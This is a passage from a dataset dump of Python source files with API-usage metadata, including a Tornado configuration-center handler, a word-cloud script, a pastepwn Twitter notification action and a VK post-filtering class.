"PyQt4.QtGui.QLineEdit", "line_number": 284, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 284, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStackedWidget", "line_number": 294, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 294, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStackedWidget.__init__", "line_number": 296, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QStackedWidget", "line_number": 296, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 296, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTabWidget", "line_number": 310, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 310, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTabWidget.__init__", "line_number": 316, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTabWidget", "line_number": 316, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 316, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 335, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 335, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 337, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 337, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 337, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGroupBox", "line_number": 340, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 340, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGroupBox.__init__", "line_number": 342, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QGroupBox", "line_number": 342, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 342, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 367, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 367, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel.__init__", "line_number": 369, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 369, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 369, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPixmap", "line_number": 375, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 375, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 379, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 379, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 381, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 381, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 385, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 385, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton.__init__", "line_number": 391, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 391, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 391, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 394, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 394, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton.__init__", "line_number": 400, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 400, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 400, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QCheckBox", "line_number": 407, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 407, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QCheckBox.__init__", "line_number": 415, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QCheckBox", "line_number": 415, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 415, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 421, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 421, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 426, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 426, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QRadioButton", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 429, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton.__init__", "line_number": 435, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 435, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 435, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 444, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 444, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox.__init__", "line_number": 451, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 451, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 451, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 462, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 462, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget.__init__", "line_number": 468, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 468, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 468, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTreeWidget", "line_number": 479, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 479, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTreeWidget.__init__", "line_number": 487, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTreeWidget", "line_number": 487, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 487, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 489, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 489, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 495, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 495, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 497, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 497, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 500, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 500, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTreeWidgetItem", "line_number": 511, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 511, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 541, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 541, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit.__init__", "line_number": 548, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 548, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 548, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 557, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 557, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 558, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 558, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 559, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 559, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 562, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 562, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 564, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 564, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 564, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 565, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 565, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 568, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 568, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 569, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 569, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 576, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 576, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 581, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 581, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidgetItem", "line_number": 588, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 588, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 589, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 589, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 590, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 590, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 594, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 594, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.__init__", "line_number": 596, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 596, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 596, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.undo", "line_number": 609, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 609, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 609, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.redo", "line_number": 612, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 612, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 612, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.copy", "line_number": 615, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 615, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 615, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.cut", "line_number": 618, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 618, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 618, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.paste", "line_number": 621, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 621, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 621, "usage_type": "name"}, {"api_name": "PyQt4.QtWebKit.QWebView", "line_number": 624, "usage_type": "attribute"}, {"api_name": "PyQt4.QtWebKit", "line_number": 624, "usage_type": "name"}, {"api_name": "PyQt4.QtWebKit.QWebView.__init__", "line_number": 626, "usage_type": "call"}, {"api_name": "PyQt4.QtWebKit.QWebView", "line_number": 626, "usage_type": "attribute"}, {"api_name": "PyQt4.QtWebKit", "line_number": 626, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QUrl", "line_number": 632, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 632, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDoubleSpinBox", "line_number": 641, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 641, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDoubleSpinBox.__init__", "line_number": 647, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDoubleSpinBox", "line_number": 647, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 647, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QProgressBar", "line_number": 668, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 668, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QProgressBar.__init__", "line_number": 670, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QProgressBar", "line_number": 670, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 670, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 691, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 691, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 703, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 703, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout.__init__", "line_number": 705, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 705, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 705, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QHBoxLayout", "line_number": 709, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 709, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QHBoxLayout.__init__", "line_number": 711, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QHBoxLayout", "line_number": 711, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 711, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 715, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 715, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout.__init__", "line_number": 717, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 717, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 717, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 738, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 738, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 743, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 743, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 788, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 788, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame.__init__", "line_number": 790, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 790, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 790, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 791, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 791, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 794, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 794, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame.__init__", "line_number": 796, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 796, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 796, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 797, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 797, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 835, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 835, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 835, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 835, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 861, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 861, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 921, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 928, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 941, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 972, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 986, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 986, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 987, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 987, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 991, "usage_type": "call"}, {"api_name": "traceback.format_exception", "line_number": 1082, "usage_type": "call"}, {"api_name": "sys.excepthook", "line_number": 1085, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 1140, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 1140, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 1142, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 1142, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 1142, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 1144, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 1144, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 1147, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 1163, "usage_type": "attribute"}]}
+{"seq_id": "7504729452", "text": "# -*- coding: utf-8 -*-\n# Created by Hans on 16-5-22\n\nfrom tornado.web import RequestHandler\nfrom tornado.options import options\nfrom tornado.web import HTTPError\nfrom config_center.untils import joinPath\nfrom config_dao import ConfigDao\nfrom app_dao import AppDao\nimport untils\n\nconfig_dao = ConfigDao()\napp_dao = AppDao()\n\n\ndef auth(p_type, apps, access_token):\n if type(apps) == list:\n for app in apps:\n permission = p_type + app\n permit = untils.auth(access_token, permission)\n if permit:\n return True\n else:\n permission = p_type + apps\n return untils.auth(access_token, permission)\n\n\nclass CreateHandler(RequestHandler):\n # 写数据库,并更新当前版本为可用版本\n def persistence_conf(self, app_name, config_name, content, version, encrypt=False, username=None):\n config_dao.add_config(app_name, config_name, content, version, encrypt=encrypt, config_owner=username)\n config_dao.un_effective_from(app_name, config_name, version)\n\n def get(self):\n app_name = self.get_argument('data', None)\n self.render('create.html', app_name=app_name)\n\n def post(self):\n username = self.get_cookie('username', None)\n access_token = self.get_cookie('access_token', None)\n appid = self.get_argument('appid')\n if not auth(untils.Permission['WRITE'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n conf_name = self.get_argument('conf_name')\n content = self.get_argument('content')\n encrypt = self.get_argument('encrypt', False) == 'on'\n content = content.replace('\\r\\n', '\\n')\n root = '/' + options.root\n if encrypt:\n # 获取密钥\n secret_key = app_dao.get_app(appid)[0]['secret_key']\n content = untils.encrypt(content, secret_key)\n # 更新zookeeper\n node = joinPath('/', [root, appid, conf_name])\n self.application.zk.ensure_path(node)\n try:\n if self.application.zk.exists(node):\n self.application.zk.set(joinPath('/', [node]), content.encode())\n else:\n self.application.zk.create(joinPath('/', [node]), content.encode())\n except Exception as e:\n raise HTTPError(500, reason=str(e))\n self.persistence_conf(appid, conf_name, content, untils.version(), encrypt, username)\n self.redirect('/')\n\n\nclass IndexHandler(RequestHandler):\n def get(self):\n username = self.get_cookie('username', [])\n app_names = map(lambda x: x['app_name'], app_dao.get_app(owner=username))\n configs = {}\n if len(app_names) == 0:\n self.render('index.html', apps=configs)\n else:\n for app_name in app_names:\n configs[app_name] = []\n data = config_dao.get_config_by_condition(app_name=app_names, effective=1)\n for config in data:\n app_name = config['app_name']\n configs[app_name].append(config)\n self.render('index.html', apps=configs)\n\n\ndef get_uniq_config(app_name, config_name, version):\n data = config_dao.get_config_by_condition(app_name, config_name, version=version)\n conf_content = {\n 'appid': app_name,\n 'conf_name': config_name,\n 'content': data[0]['config_content'],\n 'encrypt': data[0]['encrypt']\n }\n return conf_content\n\n\nclass ShowHandler(RequestHandler):\n def get(self, *args, **kwargs):\n data = self.get_argument('data')\n appid, conf_name, current_version = data.split('(')\n access_token = self.get_cookie('access_token', None)\n if not auth(untils.Permission['READ'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n self.render('show.html', conf_content=get_uniq_config(appid, conf_name, current_version))\n\n\nclass EditHandler(RequestHandler):\n def get(self, *args, **kwargs):\n data = self.get_argument('data')\n appid, conf_name, current_version = data.split('(')\n access_token = self.get_cookie('access_token', None)\n if not auth(untils.Permission['UPDATE'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n self.render('edit.html', conf_content=get_uniq_config(appid, conf_name, current_version))\n\n\nclass DeleteHandler(RequestHandler):\n def get(self, *args, **kwargs):\n data = self.get_argument('data')\n appid, conf_name, current_version = data.split('(')\n access_token = self.get_cookie('access_token', None)\n if not auth(untils.Permission['DELETE'], [untils.Permission['APP_ALL'], appid], access_token):\n raise HTTPError(403, reason='Permission deny')\n # delete from zookeeper\n node = joinPath('/', [options.root, appid, conf_name])\n try:\n self.application.zk.delete(node, recursive=True)\n except Exception as e:\n raise HTTPError(500, reason=str(e))\n # delete from mysql\n config_dao.delete_by_config_name(appid, conf_name)\n self.redirect('/')\n", "repo_name": "zhentaowang/config-center", "sub_path": "config_center/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 5229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "config_dao.ConfigDao", "line_number": 12, "usage_type": "call"}, {"api_name": "app_dao.AppDao", "line_number": 13, "usage_type": "call"}, {"api_name": "untils.auth", "line_number": 20, "usage_type": "call"}, {"api_name": "untils.auth", "line_number": 25, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 28, "usage_type": "name"}, {"api_name": "config_dao.add_config", "line_number": 31, "usage_type": "call"}, {"api_name": "config_dao.un_effective_from", "line_number": 32, "usage_type": "call"}, {"api_name": "untils.Permission", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 43, "usage_type": "call"}, {"api_name": "tornado.options.options.root", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 48, "usage_type": "name"}, {"api_name": "app_dao.get_app", "line_number": 51, "usage_type": "call"}, {"api_name": "untils.encrypt", "line_number": 52, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 54, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 58, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 60, "usage_type": "call"}, {"api_name": "tornado.web.HTTPError", "line_number": 62, "usage_type": "call"}, {"api_name": "untils.version", "line_number": 63, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 67, "usage_type": "name"}, {"api_name": "app_dao.get_app", "line_number": 70, "usage_type": "call"}, {"api_name": "config_dao.get_config_by_condition", "line_number": 77, "usage_type": "call"}, {"api_name": "config_dao.get_config_by_condition", "line_number": 85, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 95, "usage_type": "name"}, {"api_name": "untils.Permission", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 101, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 105, "usage_type": "name"}, {"api_name": "untils.Permission", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 111, "usage_type": "call"}, {"api_name": "tornado.web.RequestHandler", "line_number": 115, "usage_type": "name"}, {"api_name": "untils.Permission", "line_number": 120, "usage_type": "attribute"}, {"api_name": "tornado.web.HTTPError", "line_number": 121, "usage_type": "call"}, {"api_name": "config_center.untils.joinPath", "line_number": 123, "usage_type": "call"}, {"api_name": "tornado.options.options.root", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 123, "usage_type": "name"}, {"api_name": "tornado.web.HTTPError", "line_number": 127, "usage_type": "call"}, {"api_name": "config_dao.delete_by_config_name", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "74967807767", "text": "import argparse,json\nfrom wordcloud import WordCloud\n\nargparser = argparse.ArgumentParser(description='Wordcloud Generator')\nargparser.add_argument('file',nargs=1,help='A simple json file of word to word count')\nargparser.add_argument('year',nargs=1,type=int,help='The year to generate')\nargparser.add_argument('type',nargs=1,choices=['single','cumulative'])\nargparser.add_argument('imagefile',nargs=1,help='The output image filename')\nargs = argparser.parse_args()\nf = open(args.file[0],'r')\ndata = json.load(f)\nf.close()\nyear = args.year[0]\n\nwords = []\nif (args.type[0]=='cumulative'):\n wordCount = {}\n for langYear,languageUsed in data.items():\n if (int(langYear)<=year):\n print('processing {}'.format(langYear))\n for word,count in languageUsed.items():\n if (word in wordCount):\n wordCount[word] += count\n else:\n wordCount[word] = count\n for word,count in wordCount.items():\n words.append((word,count))\n \nelse:\n for langYear,languageUsed in data.items():\n if (year == int(langYear)):\n print('processing {}'.format(langYear))\n for word,count in languageUsed.items():\n words.append((word,count))\n\nwc = WordCloud(width=600,height=450,background_color='white').generate_from_frequencies(words)\nwc.to_file(args.imagefile[0])\n", "repo_name": "alexmilowski/goodies", "sub_path": "data-science/cfa/generate-wordcloud.py", "file_name": "generate-wordcloud.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 4, "usage_type": "call"}, {"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "38575195076", "text": "# -*- coding: utf-8 -*-\nimport logging\nfrom string import Template\n\nimport twitter\n\nfrom pastepwn.util import DictWrapper\nfrom .basicaction import BasicAction\n\n\nclass TwitterAction(BasicAction):\n \"\"\"Action to tweet a message to a given account\"\"\"\n\n name = \"TwitterAction\"\n\n def __init__(\n self,\n consumer_key=None,\n consumer_secret=None,\n access_token_key=None,\n access_token_secret=None,\n template=None,\n ):\n super().__init__()\n\n self.logger = logging.getLogger(__name__)\n\n self.twitter_api = twitter.Api(\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token_key=access_token_key,\n access_token_secret=access_token_secret,\n )\n\n if template is not None:\n self.template = Template(template)\n else:\n self.template = None\n\n def perform(self, paste, analyzer_name=None):\n \"\"\"Tweet a message\"\"\"\n\n if self.template is None:\n text = \"New paste matched by analyzer '{0}' - Link: {1}\".format(\n analyzer_name, paste.full_url\n )\n else:\n paste_dict = paste.to_dict()\n paste_dict[\"analyzer_name\"] = analyzer_name\n text = self.template.safe_substitute(DictWrapper(paste_dict))\n\n self.twitter_api.PostUpdate(text)\n", "repo_name": "Antarius225/pastepwn", "sub_path": "pastepwn/actions/twitteraction.py", "file_name": "twitteraction.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "basicaction.BasicAction", "line_number": 11, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "twitter.Api", "line_number": 28, "usage_type": "call"}, {"api_name": "string.Template", "line_number": 36, "usage_type": "call"}, {"api_name": "pastepwn.util.DictWrapper", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "43584367814", "text": "import json\r\nimport os\r\n\r\nfrom post_stack import PostStack\r\n\r\nclass Group:\r\n def __init__(self, group_id, vk):\r\n self.group_id = group_id\r\n self.posts_file = f\"data\\posts\\{str(self.group_id)}.json\" \r\n self.viewed_posts_id = PostStack()\r\n self.vk = vk\r\n self.load()\r\n \r\n def add_viewed_post_id(self, *posts_id):\r\n self.viewed_posts_id.add(*posts_id)\r\n self.save()\r\n \r\n def filter_posts(self, posts):\r\n new_posts = list(filter(lambda post: post['id'] not in self.viewed_posts_id.items, posts))\r\n return new_posts\r\n \r\n def save(self):\r\n with open(self.posts_file, 'w') as f:\r\n json.dump(self.viewed_posts_id.get_file_version(), f)\r\n \r\n def load(self):\r\n if not os.path.exists(self.posts_file):\r\n open(self.posts_file, 'a').close()\r\n self.viewed_posts_id = PostStack()\r\n else:\r\n try:\r\n with open(self.posts_file) as f:\r\n data = json.load(f)\r\n\r\n pointer, data = data[0] ,data[1:]\r\n size = len(data)\r\n\r\n self.viewed_posts_id = PostStack(size, pointer)\r\n\r\n self.viewed_posts_id.from_data(data)\r\n except Exception as err:\r\n print('Error', err)\r\n \r\n def get_new_posts(self, n=5):\r\n if self.vk[0] != None:\r\n items = self.vk[0].wall.get(owner_id=self.group_id, count=5)['items']\r\n return self.filter_posts(items)\r\n return []", "repo_name": "ammv/MyBots", "sub_path": "VkMinerBot/group.py", "file_name": "group.py", "file_ext": "py", "file_size_in_byte": 1586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "post_stack.PostStack", "line_number": 10, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "post_stack.PostStack", "line_number": 29, "usage_type": "call"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "post_stack.PostStack", "line_number": 38, "usage_type": "call"}]}
